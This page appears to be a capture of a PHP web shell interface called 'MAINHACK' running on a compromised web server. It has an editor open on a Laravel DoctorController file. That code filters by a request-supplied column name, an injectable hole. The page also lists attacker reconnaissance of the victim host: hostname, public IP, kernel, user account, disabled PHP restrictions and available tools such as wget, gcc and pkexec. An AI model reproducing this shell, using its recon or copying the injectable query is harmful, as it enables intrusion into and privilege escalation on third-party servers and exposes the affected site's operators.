[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: DoctorController.php
<?php namespace App\Http\Controllers; use App\Http\Repositories\CrudeRepository; use App\Models\Doctor; use Illuminate\Http\Request; class DoctorController extends Controller { /** * Display a listing of the resource. */ public function index(Request $request) { $collection = Doctor::latest() ->when($request->field && $request->keyword, function ($query) use ($request) { $query->where($request->field, 'LIKE', "%$request->keyword%"); })->paginate($request->input('limit', 10)); return view('doctor.index', compact('collection')); } /** * Show the form for creating a new resource. */ public function create() { return view('doctor.create'); } /** * Store a newly created resource in storage. */ public function store(Request $request) { $this->validation($request); try { $data = $request->except('_token'); Doctor::create($data); return redirect()->route('doctor.index')->with('success', 'Successfully created'); } catch (\Exception $e) { return redirect()->back()->with('error', 'Something went wrong!'); } } /** * Show the form for editing the specified resource. */ public function edit(Doctor $doctor) { return view('doctor.edit', compact('doctor')); } /** * Update the specified resource in storage. */ public function update(Request $request, Doctor $doctor) { $this->validation($request, $doctor->id); try { $data = $request->except('_token', '_method'); $doctor->update($data); return redirect()->route('doctor.index')->with('success', 'Successfully updated'); } catch (\Exception $e) { return redirect()->back()->with('error', 'Something went wrong!'); } } /** * Remove the specified resource from storage. */ public function destroy(Doctor $doctor) { try { $doctor->delete(); return redirect()->route('doctor.index')->with('success', 'Successfully deleted'); } catch (\Exception $e) { return redirect()->back()->with('error', 'Something went wrong!'); } } private function validation($request, $id = null) { return $request->validate([ 'name' => 'required|unique:doctors,name,' . $id, 'phone' => 'required', 'title' => 'required', 'speciality' => 'required', ]); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.9 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002